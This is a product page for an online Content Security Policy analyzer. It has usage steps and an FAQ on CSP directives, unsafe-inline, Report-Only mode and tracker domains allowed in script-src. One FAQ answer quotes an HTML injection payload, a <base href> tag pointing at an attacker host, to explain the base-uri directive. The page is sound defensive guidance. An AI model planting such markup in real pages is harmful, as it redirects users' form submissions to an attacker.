ZenovayTools

CSP Analyzer

Deep Content Security Policy analysis — decodes all directives, detects unsafe-inline/unsafe-eval, identifies tracker origins whitelisted in script-src, and grades CSP strength A-F with a privacy angle.

How to Use CSP Analyzer

  1. 1Enter the URL of the website you want to analyze.
  2. 2See every CSP directive decoded with per-directive security analysis.
  3. 3Review tracker origins whitelisted in your script-src (privacy angle).
  4. 4Use the recommendations to strengthen your policy.
Zenovay

Track your website performance

Real-time analytics, session replay, heatmaps, and AI insights. 2-minute setup, privacy-first.

Try Zenovay Analytics — Free

Related Tools

Password GeneratorGenerate strong, random passwords with customizable length, characters, and complexity.
Password Strength CheckerCheck how strong your password is. Get an estimated crack time and improvement suggestions.
HMAC GeneratorGenerate HMAC signatures using SHA-256, SHA-384, or SHA-512 with the Web Crypto API.
AES Encryption/DecryptionEncrypt and decrypt text using AES-GCM with PBKDF2 key derivation. Runs entirely in your browser.

Frequently Asked Questions

What is Content Security Policy (CSP)?
Content Security Policy is an HTTP response header that tells browsers which sources are allowed to load scripts, styles, images, and other resources on your page. It's the primary defense against Cross-Site Scripting (XSS) attacks — a properly configured CSP prevents injected scripts from executing even if an attacker finds an XSS vulnerability.
Why is 'unsafe-inline' in script-src a problem?
'unsafe-inline' allows inline JavaScript (scripts in <script> tags, onclick attributes, javascript: URLs). This is the most common XSS vector — it means any injected inline script can execute. Using nonces (cryptographic one-time tokens generated per request) or hashes (SHA-256 of allowed scripts) lets you allow specific inline scripts without enabling all inline scripts.
What is the privacy angle of CSP?
Your script-src and connect-src directives are essentially a permission list of who can run code and receive data from your page. If you've whitelisted Google Analytics, Facebook, TikTok, and LinkedIn in your CSP, you're explicitly authorizing those companies to execute code on your pages and potentially exfiltrate user data. This is a GDPR data processor authorization list hidden in your HTTP headers.
What does 'object-src: none' protect against?
object-src controls the <object>, <embed>, and <applet> elements — historically used to load Flash, Java, and other plugins. Setting object-src: 'none' prevents any plugin content from loading, eliminating an entire class of attacks and potential third-party data exfiltration via plugin content. This should always be set to 'none' on modern sites.
What is the difference between CSP and CSP-Report-Only?
Content-Security-Policy enforces the policy — browsers block violations. Content-Security-Policy-Report-Only only logs violations to a report endpoint without blocking anything. Report-Only is useful for testing a new CSP before enforcing it, but provides zero actual protection. A common mistake is accidentally deploying Report-Only instead of the enforced header.
How does this CSP analyzer differ from other tools?
Most CSP tools only check for unsafe-inline and missing directives. This analyzer additionally cross-references your script-src and connect-src against a database of 35+ known tracker and advertising domains, showing you exactly which data brokers and ad networks have explicit CSP permission to run on your site — a unique privacy-focused angle.
What is the base-uri directive and why does it matter?
base-uri controls which URLs can be used in the <base> HTML element. If a site is vulnerable to HTML injection (but not script injection), an attacker can inject <base href="https://attacker.com/"> to redirect all relative URLs — like form action targets — to their server. Setting base-uri: 'none' or base-uri: 'self' eliminates this attack vector.